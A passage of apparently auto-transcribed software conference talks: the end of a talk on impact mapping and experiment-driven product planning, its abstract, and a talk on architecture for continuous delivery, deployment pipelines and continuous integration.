to sell off everything this quick. And they said, okay, you know, let's do that. They started doing it and they have changed people's behavior. People started buying a lot more vacuum cleaners. They have succeeded in that they've made the next turn. Actually, they've done it much, much better than they expected to do that. And then somebody somewhere else in the company looked at an extra spreadsheet and said, wow, more, more, more. So they started selling new equipment like that. And they started kind of because the travel agents couldn't keep up with that. They started doing more, more, more, more, more. And then they realized, well, you know, we people who we work with in Europe can't keep up with this, we need to expand this. And some genius somewhere came up with the idea to expand this offer for intercontinental flights. So it doesn't take a math genius to understand that people were soon buying 100 pounds worth of vacuum cleaners to throw them away and get the 700 pound ticket to the US. And a slight financial loss was no longer slight. They started bleeding money out. So they had this next turn and they've made the next turn. And then they realized, okay, let's make it again. Let's make it again. Let's make it again. And they've not measured whether it's actually leading them in the right direction, whether they've achieved what they wanted to achieve. So the net result of this is the UK company went bankrupt. They took a 50 million pound loss. The European arm was sold to Italians and Hoover pulled out of Europe. It took them seven years of dragging through courts to resolve all the customer complaints. As a marketing campaign, that's as bad as you can get. But during the time when they were doing it, it was a massive success. They shipped and shipped and shipped. The fact that the ship was turning over, nobody cared. So kind of Brinkerhoff says that in addition to monitoring this, we need to figure out what is the big picture change and how do we measure the big picture change? In essence, why do we want to do this? Why is this a good idea? And how do we measure in a bigger picture? This was a good idea. So that's what we started doing with user stories. I started giving people cards like this. When they give me user stories, I said, don't worry about user stories yet. Kind of try and tell me what somebody can do faster or better or slower or worse. So what is the change in somebody's work and what that helps you really achieve? What is the big picture there? And we kind of put ideas on things like this and then we kind of group them together. And this gave us the GPS thing. Because at the end of the day, if we get to the destination, if we want to sell more vacuum cleaners and we do sell more vacuum cleaners but decide how much more is more, it doesn't matter how we got there. So this starts creating lots of options. It starts creating the GPS thingy. And then I found this mental model from three psychologists called Gibb, Weisbord and Drexler. These guys were working with non-government organizations in the United States in the 60s. And they were fighting one particular problem. They were fighting a problem of people having lots of money. Non-government organizations have lots of money. They had lots of people involved. Lots of staff, lots of volunteers. And they weren't really achieving anything big because they realized they were all pulling in different directions. And the reason why they were all pulling in different directions is that people hated planning. As a volunteer, you want to do stuff. You don't want to spend six months planning. And we have a very, very similar problem today. Software has lots of money. It's in all the industries there. Software has lots of people involved. And it's not kind of I personally hate planning, but there are lots of people who love planning, but we do not have time to do that. Stuff changes too quickly. So it's a similar position where they said people hate doing this because it takes six months. We need to give them a way to plan this in one afternoon and align well on what they want to do so they're driving the same direction. And what these guys realized is something that's fantastically useful for software today is that in one afternoon or one day by asking four questions, you can align senior stakeholders and create a very, very good set of options for your GPS. You can do kind of those cars through this. So what they were talking about is four questions that said, well, why are we doing this in the first place? Who needs this? Who are the people we want to influence? Who are the people who want to kind of allow to change who wants this? Then what do these people want? What do these people need? And at the end, well, how can we help them do that? So this is kind of from a business perspective, some business behavior. This is some software deliverable in our case. And they said, well, you start wherever you know. People typically know this. I want an iPhone up. Yes, of course. And kind of you work your way up and down until you align everybody's expectation. You do that on a whiteboard to align people's opinions. This is an incredibly effective technique. There's a Swedish interaction design agency that independently, I think, came up with the same set of questions to visualize project scope. They called that thing an effect map because they visualize big effects. And what they've done is they created a mind map starting from here and growing into lots of options. And we look at it, it looks like a roadmap. There's a destination. There's lots of roads. And all of these roads kind of lead to the same thing. So you can choose which one you want. And they were asking the same kind of questions. What I realized is for my projects at least that are not government projects. I work with banks. I work with insurance companies. Kind of it's slightly better to ask a bit of a different question. So the first two stay the same. But the third question isn't what do these people want? Because all my customers always want to become rich and move to the Caribbean. That's not part of my project. The more important question is how do we want their behavior to change? We're going back to Blinkerholtz behavior change model. So how do we want their behavior to change? And then the last one kind of it would be stupid to ask how, how. So we started asking, well, what can we do to support this change? So we started creating mind maps like that. It's incredibly powerful. Here's an example. I worked with a gaming company where the owner of the company came in one day and said, the next thing we'd like you to do is levels and achievements for all our games. And here's what the marketing department came up with. Here are some wireframes. Here are some diagrams. It was roughly about seven to nine months of work. And he said, this is a really nice tunnel. We'll go into this tunnel now. Seven months later, we'll maybe come out. Let's perhaps use this engine we have that can deliver every two weeks to at least breathe some air and figure out how we go in the right direction. And we said, let's just go through this thinking process and ask these questions. And we said, well, going back to kind of the give voice, but the rexla model, this is the answer to the last question. This is kind of the software deliverable thing. Now, how does this change somebody's behavior? And he said, I don't understand what you mean. He said, imagine that we spend nine months working on this, the whole team. And the users are still using our website the way they used to use it today. Nothing changes. Was this a waste of time and money? He said, of course. So what would you expect to change in their behavior if they have levels and achievements? He said, well, I'd expect them to post to Facebook more because you come up, you know, you get your level five wizard thing and you post to Facebook. So all of a sudden, we know what the behavior changes and we know who we are talking about. Lots of users stories talk about as a trader, I want to trade because I want to trade or as a system, I want this report. This thinking process gives you who and why. And what's really interesting is scope creep doesn't fit visually in. As a system, I want this report doesn't fit visually in. And we kind of said, okay, the next question is, why is this important? And he said, well, it's important because I want it. And I'm paying for this. And he said, well, that's okay. But you know, kind of help us understand on a higher level. What are you getting from that? Maybe why is too big of a question now? Let's ask the other question. How does this change somebody else's behavior? So they said, you know, jump up and down. How does this change somebody else's behavior? And he said, well, if players post more to Facebook, other people will read more about this and come to play the games. He said, okay, why is that important? I said, well, that's a stupid question. More players, more money. We know that the player is worth about $100 over his lifetime. More players, more money. He said, okay, what you actually want to get is more players. Now, how much more is more? When do we stop? What is our destination? And he said, well, more. I said, well, if we spend seven months doing this and get five more players, is that enough? He said, don't be stupid. Well, at which point is this failed? And he said, well, if you don't get at least one more million players, we have failed. He said, okay, one million at least. So now we have this kind of set of questions. And we said, let's not go into a tunnel. Let's not spend seven months doing this. Let's prove that this road exists. Let's prove there are no trolls on this route. And he said, well, what do you mean? Well, maybe we can do something very quick about this and prove that this road actually exists. Let's do, you know, let's seek out variability. Let's seek what worked. And one of the guys said, well, look, we have tournaments. One of your achievements is tournament winner. There's a lot of complexity around that. Let's do something simple. Let's, if you win a tournament, we pop up a dialogue and we say, you won a tournament, would you like to post to Facebook? So we added an option there. Kind of, it's visual, it fits in. There's a new user story, very small user story that kind of contributes to a business goal. Or we think it does. And we said, let's do that. This is five hours of work. We did that. And we have proved that people do not like to spam their friends. So we said, okay, you know, maybe spending seven months on this road isn't such a good idea. And that's where we really started doing kind of the design thinking thing where let's create options. If what you want to do is one million players, maybe there's some other ways of getting there. And this is why kind of this mind map structure is good because it asks, makes people ask the right questions. Like we said, well, we know players can post more. Is there anything else players can do? Is there some other way we can change the behavior? Is there somebody else we can influence? Is there something else we can do about this? You know, maybe let's come up with options. Let's create a map. And we, somebody said, okay, um, players could actually invite their friends more than they do now. And we can automate this. I can come up with some nice wireframes. I can, you know, I will give them trips. We do this. Let's not do the same thing again. We have this nice fast engine. We do not have to do water scramble. You don't have to go away for two weeks and give me the diagrams. Let's prove that this road works. So let's not automate everything yet. So maybe we can do something that's semi automated. Maybe we can put a page there that has a button that says invite your friends. And that doesn't really do anything. We'll pay people manually. We'll give them chips manually. We will invite their friends manually. And we'll prove that this road exists or doesn't exist. And we did that. And then we stay, stay two nights. We sent a couple of hundred emails and nobody came. So we proved that people, yes, if you promise them free chips, they will invite their friends. So this road here exists. This road there, we have not discovered yet. And we went back to the marketing department and said, sorry, bad idea. And they said, no, no, this is the best idea in the world. It must work. You have done something wrong. There's a bug. I said, no, no, no, look, there's no bug. There's no software. I've sent email myself. I can show you the email log. So there is no bug. Now, what I've realized at this point is something very, very interesting is this is a way to visualize assumptions. All the roads on this map are assumptions, which is a very liberating thing, because we said you do not have to be right. Give me an assumption why you think this failed. And we'll test it. We were really fast engine. We do 70 story points. Our velocity is fantastic. We test it. Give me an assumption you don't have to be right. You don't have to plan for a long time. And he said, well, my assumption is that the text in the email was wrong, because the link is not really differentiable from the rest of the text. It says join the game, but it's not really obvious. It's a link. It's in a paragraph of text. Maybe people didn't see that. He said, okay, let's test that. So we said, let's do a variation. We put a big, big button that says join a game. We sent a couple of hundred emails, and we proved that this road now works because people were inviting their friends and friends were coming. And then what we did is we proved this is a really wide road. Now there's no congestion. We drove a truck through that. By the time we ticked off the first couple of options there, we had one million players. We spent about three weeks doing that. We did not have to spend seven months doing levels and achievements, because we have achieved what we wanted. Now the question is what next? So that's kind of the thinking process behind this. And I am not saying it applies to everybody. There's lots of challenges with this. What I wanted to do with this thing today is challenge your thinking. What would be the right questions to ask in your environment? The nice thing about this technique is it's visual and it's fast. You get people to draw on a whiteboard. They start agreeing. They start aligning. That's what Gibo Iceboard and Rex did. So the key advantage of this over the other stuff I've done that's similar is it's collaborative. It's visual. It's fast. It's for people who hate planning. It's for people who don't have time to plan. And it visualizes assumptions. There's very few software requirements models that visualize assumptions. So it creates lots of options. And remember that with the roadmap, unless you are Google Streetcar or NSA, your goal is never, ever, ever to drive through all the roads. When you look at the roadmap, you would never say, okay, there's 500 streets that get me there. I'll drive through all of them and then I'll get out and get a coffee. What you try to do is get the shortest path possible or the fastest path possible. You know, sometimes the most enjoyable one, but kind of find a path through that. Find options that lead you to the goal. So think about that. So here's some.
|
Software is everywhere today, and countless software products and projects die a slow death without ever making any impact. Today's planning and roadmap techniques expect the world to stand still while we deliver, and set products and projects up for failure from the very start. Even when they have good strategic plans, many organisations fail to communicate them and align everyone involved in delivery. The result is a tremendous amount of time and money wasted due to wrong assumptions, lack of focus, poor communication of objectives, lack of understanding and misalignment with overall goals. There has to be a better way to deliver! Gojko presents a possible solution, impact mapping, an innovative strategic planning method that can help you make an impact with software.
|
10.5446/51434 (DOI)
|
Okay, so my name is Jess Humble. I work for ThoughtWorks. We do consulting and delivery for software and we have tools to help you with that. Mingle for agile project management, Go for agile release management and Twist for agile testing. I co-authored this book called Delivery and I'm here today to talk about architecting and re-architecting and continuous delivery and the relationship between these things. So it's not going to be a detailed kind of lots of code on the whiteboard talk. So if you want something very detailed and codey, now would be a good time to go and see one of the other things that is more detailed and codey. I'm not at all offended if people decide to walk out and go and see something else instead. If that would be the best use of your time, please go ahead and do that. Don't feel bad at all. Also there's voting at the end. So at the end, please choose a green card, a yellow card and a red card depending on how you feel about the talk. Remember that in China red is lucky but in Norway not so much. I've been having a great time in Norway. It's my first time here. I went to Bergen on Monday and I got sunburn which was unexpected but very nice. So architecture. Architecture is a term obviously that comes from building buildings and if you're actually building, if you're doing construction, doing civil engineering projects, one of the important things as an architect you have to care about is what's the nature of the materials you're using. Iron, steel, wood, plastic, all these things have different characteristics and that affects the way you think about what you're building. And so obviously if you're building, if you're architecting things that have to stand up for a long time like a bridge, you have to think carefully about the materials that you're using. Now project management and architecture are focused around building things like this or buildings which have a certain set of characteristics. So once you build a bridge or a building, normally it doesn't fall down. That's bad normally. That means you've done a bad job. Once you build it, it doesn't change a lot. So we don't build a bridge and go, well that isn't really right and that isn't what we wanted. We're going to totally change the way that works now because our users didn't like that. Running a bridge requires different skills from building the bridge, completely different set of practices. Once we have built the, once we've designed the architecture for the bridge and thought about how we want it to behave, actually then building it will not give us lots of new information that makes us think again about the architecture. That's not supposed to happen when you're building bridges and buildings. And then most importantly when you're building a bridge, you have to finish it before you can start using it and before you can determine the return on investment that you will get from having built it, the value that it's delivered. So you'll notice that all of these statements that I've made about bridges do not apply to software. And what that means is that architecture and project management techniques that we use for building bridges are actually really bad for building software. We should not be using them because they drive the wrong kinds of behaviors. Do we want our software once we've released it to users? Do we want to make sure that it doesn't change that much? No. We want to get feedback from users and build something that's valuable to them. Most of the time when you build software for someone, it's not what they want. 19 out of 20 startups fail because they've built something that wasn't valuable to customers. So, you know, if 19 out of 20 bridges that we built turn out not to be useful, that would be really bad. Right? So software is fundamentally different from civil engineering. And that affects the way we should think about architecture. In software, we can start delivering value to our customers from early on in the project before the thing is finished in terms of having all the features that we would ultimately like. People might derive, hopefully people can derive value from early on before we finish building all the features. We can give some people a subset of the features and they will find those useful. It's cheap to prototype and experiment with software. We can spike things out. We can prototype things very, very cheaply. That's not true with bridges. Once you've delivered some software, compared to a bridge, it's relatively simple to make changes, even large scale changes with software. And then finally, with a bridge, to build a bridge, you don't need highly paid architects. You need a bunch of construction workers. That's not true for software. And unfortunately, this idea that the highly paid architects will design the software and we can hire a bunch of cheap people who aren't very smart to actually build the software is one of the biggest problems in the software industry today. Because when you actually build the software, you make loads and loads of discoveries about how the thing will actually work because software is a complex system. Software systems are complex and they have dynamic complexity. That's not true of bridges. You can model bridges and model the forces on them analytically. You cannot model the way users will interact with your software using analytic models. They are complex systems. And when you build complex systems, you discover a lot of information in the course of building them that affects your decisions or that gives you feedback about your decisions on your design. Building software is harder than thinking about the design. So, what would a system built to leverage these characteristics, which are characteristics of software, if we built a system that leveraged these, if we actually used our materials and played to the strengths of these materials that we're using, software, what might that system look like if we actually played to the strengths of software rather than applied civil engineering techniques? Well, you might find something like this. Amazon.com, this was at Velocity last year, you can see that Amazon.com, they were making changes to production every 11 point seconds. They were making, doing 1,079 deployments to production per hour. Up to 10,000 boxes in production at the receiving end of a deployment, oh, sorry, on average, and 30,000 in total. So, people sometimes ask me, you know, Jess, can continuous delivery scale? And I say, have you heard of a website called Amazon? It's quite big. They are doing this and they have to worry about Sabane's Oxley and PCI DSS and all the regulations and things that make this stuff difficult. So, why did they do this? I mean, this is hard. Continuous delivery is hard. Doing all this stuff is hard. Why do they care about it? Primarily so they can run lots and lots of experiments to try and find out how to deliver value to users. When you design, when you come up with an idea for a software product or a feature, what you have is a hypothesis. And what you want to do is try and test that hypothesis. And the most expensive way to test the hypothesis is actually to build the software. That's the most expensive and inefficient thing that you can possibly do. You know, and if you're building bridges, you kind of have to do that, right, or buildings, but which is why in 2008, the construction industry took a total nose dive because suddenly we had all these things that were unfinished that we couldn't make money from. So, the reason they do this is so they can run experiments. So, they can come up with ideas for features and run an experiment and A-B test in production to find out if it will actually change people's habits. If people, they will make more money from people if we have the buy button here rather than here, if we present books that other customers like here on the page rather than here. How can we improve the experience of customers so they spend more money? And we do that by running loads and loads of experiments doing A-B testing. That's why they do this. It's so they can make things better for their customers by testing hypotheses really, really fast and getting feedback and establishing a close connection with their customers so they can deliver value. So, that's the main value of continuous delivery. And by the way, as a side effect of continuous delivery, you also reduce the risk of release and make deployments much easier and less risky, which is nice. Otherwise, you couldn't do this, right? So, the point of continuous delivery is to reduce the cost, the time and the risk of delivering incremental changes to users. It's so we can make incremental changes to our software all the time really, really cheaply and at low risk. That's what it is. How do you know when you're doing it? The idea is that your software should always be releasable on demand. From the very first feature you build, you should be able to press a button and release it. Releasing should be boring. If we're doing continuous delivery right, releases are boring. You're not going in at the weekend. You're not staying late at night. It's a boring thing you can do during peak hours by pressing a button. No big deal. We prioritize keeping the system releasable over new functionality. If at any point we discover the performance is dropped below a certain threshold or the acceptance tests are failing or there's a security problem or the unit tests are broken, we stop and fix that problem before we do new work. So, we're not, oh, you know, we must cut. The acceptance tests aren't working but those failures aren't important. We'll just carry on delivering features. No, you shouldn't be doing that. In order to make that possible, people need to get fast feedback. If I write some code or make a configuration change and it takes me a week to find out whether that's going to degrade performance, that makes it very hard for me to actually be fast at delivering code because I'm getting feedback from what I was doing a week ago on whether that thing actually affected performance. I don't know about you guys. I can barely remember what I was doing yesterday, let alone a week ago. So, I get a bug report from a week ago. I have to try and triage it, work out what was going on. It's an absolute pain. By the way, people sitting here, there are seats up here. So, please feel free to grab seats and bother these people. And if people at the end could move down so that these people can move in, that would be super. Thank you. Cool. Thanks very much, everyone. And this fundamentally changes the way we do product delivery. Instead of having these projects where it's very waterfully, what we should be doing is you start with an inception. We've got a new idea for a product. And we're going to get together as a team and work out what's the vision we're trying to achieve? What's the measurable customer outcome we want to achieve? And then design an experiment to test if we can achieve that measurable customer outcome using the proposed software program. So, we design experiments and then we run the experiment. It's called the minimum viable products, but it's an experiment. And most of the time, that will produce some results that tell us that users don't want what we built. If we're innovating, innovation is high risk. We want potentially high returns. When you want a high return, you are going to take risks. I mean, this is investment 101, right? And so naturally, if you're taking risks, most of the time, what you want, what you build is not actually going to be valuable. So, most of the time, we'll fail with this. And what we produce is not something that people want. And we either pivot, change our business plan, or we can keep delivering increments and trying to move closer towards what customers want. But the first thing we build will not be what our customers want if we're innovating. So, we need to find ways to find that out cheaply and then to iterate or pivot based on that. So, what are the implications of this for architecture? So, fundamentally, what architecture is about is cross functional requirements, performance, availability, scalability, all the other illities. That's what architecture is for. Architecture is what makes sure that our software will meet its cross functional requirements as opposed to the design of the features which is about meeting the functional requirements. So, architecture is what allows you to do this stuff. What is important for continuous delivery? First of all, we want to make sure that any increment that we build is testable at all levels. So, I should be able to run acceptance tests on my workstation. I should be able to get, find 80% of the bugs in my software by running it on my workstation. If I have to get an integrated environment and stand up 20 different services and try and get them to all work together before I can run my acceptance tests, I have a problem because it's expensive to do that and it's painful to do that. And so, I'm going to get that feedback very, very infrequently because it's such a pain to actually do that. So, that's an architectural thing. If I can't run the software in a non-integrated environment on my workstation and get the feedback, that means I have an architectural problem. We need to take account of that in the architecture, actually making sure that I can run tests on my workstation. If I need continuous delivery, I need to be able to do incremental development on trunk. That means continuous integration means everybody is checking into trunk at least once a day. We are not working on long-lived feature branches. If you're using feature branches and you're not integrating them into trunk once a day, then you can't do continuous delivery because you can't get feedback on whether your code actually works. You know, working on my workstation is meaningless. Works in production integrated with the rest of the code, with realistic data sets and realistic loads, then maybe I'll consider thinking about saying it's done. People use feature branches because they want to optimize for working, for getting done with their feature, but that's kind of pointless. So our architecture needs to enable us to be able to do that, to be able to work incrementally on trunk, which means we need to follow things like the solid principles, make sure that our software is well encapsulated and that it's componentized so that if I make a change, it doesn't splatter all over the code base. Deployability is an architectural concern. How easy is it to deploy the software? So people talk about deployment automation. We should take the deployment process and automate it. If the deployment process is really complex and flaky and I automate it, what happens is I turn a complex error-prone manual process into a complex error-prone automated process, which is no value. We need to simplify first, make sure that it's simple to deploy and then automate that. And if the architect, and that's an architectural concern, if it's really hard to deploy the app because I need to stand out a bunch of different things and then apply a bunch of different configuration settings from a bunch of different repositories and it's really difficult to actually stand up or to deploy some new part of that, then I can't do that. We need to focus on making deployment simple so that we can automate it effectively. Also, if we're going to deploy, you know, frequently, then we need to make sure that maybe we have availability constraints, maybe we have an SLA that says our service can't be down. So if I need to take the service down in order to deploy, maybe that's a problem. Maybe I won't meet up my SLAs. So you're thinking about things like, well, if I keep a bunch of state in the cache and I need to flush the cache every time I do a deployment and I can't do that, that's a problem. This is one of the reasons that Ruby on Rails has at least some nice characteristics. All the user state is in the database, so I don't need to worry about session caches and maintaining session caches across deployments. These are things that you need to think about if you're thinking about continuous delivery and by keeping state in session caches, availability and security and all these things during deployment. So architecture for continuous delivery, there's two things. There's firstly, making sure that we can test our cross functional characteristics all the time against any change. And this is an important characteristic of complex systems is that I make a change, I cannot predict the consequences of that change. This is the problem with code inspection, with code reviews. Code reviews will help you find some problems, but we are building complex systems. And so I make a change and I can perhaps in my head predict some of the consequences of that, but it's going to be really hard for me to predict things like what's the impact on performance. Nobody sets out to degrade performance. People degrade performance by mistake because they're building complex systems and we make changes at degrade performance and we didn't realize that was going to happen. And the person reviewing our code didn't realize that was going to happen either. So we need to be able to find those things and validate them by testing. The other part of architecture is designing for resilience. When you build complex systems, failure is a normal part of the operation of complex systems. It's not something exceptional, failure is a normal part of the operation of systems. This is what people doing disaster analysis for Three Mile Island and other problems discovered. When you build complex systems, you can't prevent failure, but you need to design your system to be resilient to failure. So that's the other part, the second part of architecture. So we're going to talk about testing first. If you have questions at any point, stick your hands up. I'll try and leave time for questions at the end as well, but if you ask, if you want clarifications, stick your hand up during. If you have a long question, keep it to the end, but feel free to argue with me if you think I'm talking crap. I appreciate that. So I'm going to talk about testing. There's this quadrant diagram created by Brian Merrick where he divides testing up along two axes, whether the test support programming or whether they critique the project, whether the tests are technology facing or whether they're business facing. And so down on the bottom left here, unit tests, component tests, these are tests that test one small part of the system in isolation, a single method, a single function, and then groups larger than that. And these should all be automated. And you should be using, who here uses TDD, who writes tests before they write the code that makes the test pass? That is fabulous. That's about a third to nearly a half of you. That's the best result I've ever had. So good job. TDD is, in my experience, the only way to create maintainable suites of unit tests. But that stuff should always be automated. Up on the top right here is the stuff that you use your expensive valuable human beings for. It showcases usability testing, exploratory testing. These are things that only human beings can do. On the top left here are the functional acceptance tests, end-to-end tests that run in a production-like environment that demonstrate that the software delivers the expected business value to users. And then here are the illities. These are the things that you're validating your architecture. Will the system scale? Will it meet its SLAs in terms of availability? Are there security problems? Is it deployable? Is it testable? So these are the things that are validating your architecture. And some of those things are automatable. So performance testing, if you've done your acceptance tests right, you can reuse them as a basis for load testing. Some kinds of security tests are automatable, like penetration testing. You can do some of that in an automated way. You can use static analysis to look for buffer overrun, SQL injection, attack, and all these kinds of things. But some of it can't be automated. So some parts of security testing are very hard to automate. What do we do once we have all these tests? What we do is we create a deployment pipeline. And I want to give you an example of a deployment pipeline in the context of an interesting domain which is firmware. So who here is working in embedded software? Any embedded software people? Okay, one person. Who's building websites or web services? Whoa, okay, almost everyone. Anyone building user-installed products? Okay, a smattering of you, maybe a quarter of you building user-installed products. So what I'm going to talk about applies to user-installed products as well. But it also is very important for building web services. A lot of the same lesson supply. So HP LaserJet team was building, I mean, these are the people who built the firmware for LaserJets. And in 2008, they had a problem. And their problem was they were too slow. And the business came to them and said, you're too slow, we need you to fix it. And they went and looked at what they were doing. And they found that most of their time was not spent writing new functionality. They had, for example, a different branch for every group of printers and scanners and multifunction devices they were creating. So every time they came out with a new product line, they created a new branch inversion control. And so they were spending 25% of their time porting code between branches. I had a new feature or make a bug fix to this line of printers. I want the same thing in another line of printers. I need to merge it between branches. And they were spending 25% of their time on current product support, 15% of their time on manual testing, detailed planning, code integration. You subtract that from 100, you're left with 5%. Which they claim was time spent innovating rather than lying down with aspirin in their body because they were totally exhausted. So they had to do something. And what they did was pretty radical. They re-architected the system from scratch. And their main, the main criteria for the re-architecture was the ability to check in everything to trunk. Not to have branches, everything was going to be on mainline. And the way they did that was they created feature toggles, basically. So there was one build that was created that was deployed to all the different devices. And when you start the device, the firmware boots, it looks to see the device that it's on and it switches features on or off depending on the device. So the ability for the developers to check in on trunk was an architectural concern. And they made sure that architecture supported that so they could get rid of this 25% of their time they were spending porting code between branches. And what they were then able to do was to create a deployment pipeline. Where they had, so HP LaserJet team, 400 people distributed across the US, Brazil, and India. Anytime anyone makes a change, we run about 45 minutes that so people check in to get to a branch, to a queue. And when they check in, we automatically run 45 minutes worth of tests against that queue. If they fail, you get an email which tells you what went wrong and they actually send you a binary of the build so you can run that on your workstation and reproduce that problem on your workstation. So you automatically get an email which tells you what the problem was and gives you a build so you can press a button and reproduce that problem on your workstation. Again, architectural concern. Any change that passes those tests, they batch them up and run about 45 minutes of tests again against the batched up changes. And if those changes pass that set of tests, then it gets checked automatically into trunk. So unless you pass these two gates, you can't get into trunk. But they were getting 10 to 15 good builds a day out of this process. So every day there'd be enough check-ins. There was about 100 to 150 check-ins every day. About 100,000 lines of code were changing every day. So it's a 10 million line code base, 100,000 lines of code changing every day, 100 to 150 check-ins, and they were getting 10 to 15 good builds a day out of this process, off trunk. Any build that comes out of stage two goes into level two. Level two is automated acceptance tests, about two hours worth of automated acceptance tests that run against the software running in a virtual machine that simulates being on a printer. If the build passes that, it goes to level three. Level three is a bunch of logic boards. And so the logic boards power on, they download the latest build that comes out of level two, and then automated acceptance tests that run against that build running on physical electronic logic boards to test. And then if you pass that, every night we run regression tests. They had about 30,000 hours worth of regression tests that run in parallel on a massive grid every night, which was level four. And what they did is they were constantly moving the tests between the different stages. So if you have a test that failed down here, we push it up into stage two. Any tests that are passing all the time in stage two, we push them down. So they were constantly moving tests between these stages to make sure they got fast feedback that they found out here that there was a problem, not here. And one of their goals at the program level was to make sure they were getting 95 to 98 percent pass rate out of level two and level three. So most of 95 to 98 percent of the problems were being found up here when it was fast. So it took a lot of investment for them to build this. They had to invest in building the automated tests. They had to invest in building this deployment pipeline. They had to invest in re-architecting the system to support development on trunk and to support being able to run. So anytime something fails in level three, same thing, you get an email with the bug details and a binary that you can deploy on your workstation to reproduce the problem. So they invested a lot of effort into that and they re-architected the system to support the ability to do this. And what they got as a result of that was that they knew within 24 hours whether there was a serious problem. And what that meant was they could introduce new features after code freeze. So they had a code freeze but it was basically irrelevant. You could still change the software and make new changes to the system even after code freeze right up to days before the new release because you knew you were always working off a good foundation. That your software was deployable and they prioritized keeping the software deployable over doing new work. And what that meant was they could go to the business and the business likes one year plans. And they said, okay, we're not going to do that anymore. In return, you can change your mind at any time about the features and we will just change direction right there and then. And that was the trade-off they were able to make which got rid of the time spent doing detail planning. So they didn't do detail planning anymore because the business can change their mind at any time and that's fine. And instead what they were able to do is get rid of a lot of this waste in the process. People think lean is about cutting cost. Lean is not about cutting cost. This is expensive to invest in. What it does is it removes waste and then that leads to cost reduction. And in particular they are able to spend much more time innovating and that drove down the cost of actually building new software. So continuous integration is probably the first thing that you need to be practicing as a way to drive this out. So who's doing continuous integration? Put your hands up. Keep your hands up if you're doing continuous integration. Keep your hands up. Put your hands down unless everyone is checking into trunk at least once a day. If you're working on feature branches that live for more than a day, put your hand down. If your build is broken for more than 10 minutes at a time before being fixed, put your hand down. If every check-in does not result in build and tests being run, put your hands down. Okay. So the people in the audience with their hands up are the people who are actually doing continuous integration. Congratulations to you. Continuous integration is not running Jenkins against your feature branches. It's a practice. You can do that practice without any tools at all. James Shaw has a paper, Continuous Integration on a Dollar a Day, that talks about doing continuous integration with an old workstation, a rubber chicken and a bell. No CI server. It's a practice. It's a mindset. Keeping the software releasable over doing new work. Always working off trunk. You know, here's 400 people asking, you know, does continuous integration scale? So exhibit A, 400 people distributed across three continents doing 100,000 lines of change every day to a 10 million line code base getting 10 to 15 good builds out of that. You scale this by throwing hardware at it. That's the definition of a scalable process that you can throw hardware at it and solve it. Using feature branches is not a scalable process because the longer the feature branches live and the more people there are on the team, the pain of integrating scales in a nonlinear way as you increase those numbers so it does not scale. Whereas continuous integration does scale. Exhibit B, this is from Google. Google have a continuous integration system that runs, there's 200,000 test suites in the code base. They're running 10 million test suites per day off their CI system in Google. They run about 60 million individual test cases per day. About 4,000 continuous integration builds every day. So continuous integration scales. But what continuous integration requires is that we work in small batches, that we make all changes. Any big change, we break into a series of small changes that keeps the software releasable. And that is the difficult bit. Having developers understand how to break every change into small bits. So if I was going to hypnotize you and have you and slip something into your unconscious, the most important thing I would have you take away from this is the importance of working in small batches. Whether that is, you know, if that's code changes or organizational change or any other kind of change that you're doing, working small batches, that's the thing I want you to take away. Whiskey, beer, working small batches, budgeting, anything you do, find ways to work in small batches, that's the important thing. So I'm going to talk now about patterns for continuous delivery in addition to the kind of the practices that you should be doing. So there's a great quote from this guy. This is Jesse Robbins. He was in charge of availability at Amazon. So all of Amazon's sites, he was the head of availability for all those sites. He's now, he was co-founder of Ops Code, who makes Chef. He's also a volunteer firefighter in his spare time, so an enormous overachiever, basically. So this is what he says about web architecture. Success on the web depends on continuous deployment of reliable software to an unreliable platform that scales horizontally. So that is one of the best statements of web architecture that I've ever found, because it covers so many things in such a dense single quote. So unreliable platform. If you're using Amazon, AWS, any of these different systems, that's an unreliable platform. Do you guys have Netflix in Norway? Yeah, okay. So if you were using Netflix on Christmas Eve last year, you would have noticed that it didn't work. So there was me, Christmas Eve, I have a four-year-old daughter, and she was wanting to watch Disney films on Christmas Eve, and she couldn't because Netflix was down and we have Apple TV and not a proper TV. So that was a problem. I was quite upset about this. And it turns out this was because of a load balancing failure in one of the Amazon zones that caused this problem. Now, people were very quick to blame Amazon about this. This was not Amazon's problem. Amazon were within their SLA. Netflix was not able to meet its SLA. Actually, I'm not sure if that's true because they probably don't even have an SLA because they're sensible. But in as much as they were to have an SLA, if their SLA was higher than the SLA of the infrastructure, that's not Amazon's problem. That's Netflix's problem. So think about the SLA for the software you're building. If that has to be more reliable than the platform that it's built on, that's an architectural problem. You need to think about how to architect your way around that. And that's where the scales horizontally thing comes from. The way you make a, one of the ways you make a resilient system is by making sure that system is resilient to failures of the underlying infrastructure, which means that you should make sure you can move transparently between different availability zones. So Google and Amazon and Etsy and other high performing companies, they actually test this. And they test this by actually bringing data centers down. They do things called game days. There's a great article on game days if you look in ACM where they actually will just, they will say, okay, in six months we're going to run an exercise and they actually just turn off the fiber to a data center. And then they'll ping the person and say, have you, and they'll let them know they're going to do this. They're like, we're going to run a test on your SLA. And then they'll say, okay, we're going to bring down the data center. And they physically switch it off. And they're like, are you within your SLA? And then the site reliability engineer will actually check to see if they're in their SLA. And then they'll bring down a different data center because the SLA says you have to meet, be able to meet your SLA even if there's two data centers down. So then they brought down the European data center and made sure that they were still within their SLA's. So at Google, they test this by actually causing disasters and seeing if the system will actually still meet its SLA's. And obviously they make sure that if it doesn't, they can back out the disaster. They don't actually like burn down data centers. Right? I mean, they just switch off the fiber to make sure that you're okay and then they can switch it back on again if you're not. So that's how you test it by actually causing real problems. And if that makes your compliance people start to freak out, then you know, you've got a problem. But the problem is not with you, it's with your compliance people. So I'm going to talk a bit about the continuous deployment part of this, patterns for continuous deployment. So number one thing is that low risk releases are incremental. So I'm going to present a number of different patterns for making releases low risk and boring. Pattern number one is called expand contract. So you have a system, it's probably composed of a bunch of different bits. You know, you have some static content, you have your app, you have a bunch of services it depends on, probably has a database. Who's building a system that doesn't have a database? Okay, maybe one dude, maybe. Okay. Yeah, all right, fair enough. So what we don't want to do is deploy, you know, every time you make a bunch of changes, you have to deploy all of those, what you don't want to do is deploy changes to all the system at once. Instead what you do is you put out the new version of the static content in a different directory before the release. And then what you do is you can roll forward and roll back this without having to change the static content. The same is true of services. If you depend on an upstream service, you don't deploy the new version at the same time you deploy the app, you deploy the new version beforehand and smoke test it and make sure that it works before you deploy the new version of the app that depends on it. This is something that Amazon Web Services does, you know, if AWS releases a new version of EC2, they don't just change the API and sorry you can't use the old API anymore, that would make people very angry. Instead, you provide the API version you want to use as a query string parameter so that as a consumer of the service, you can choose when you want to 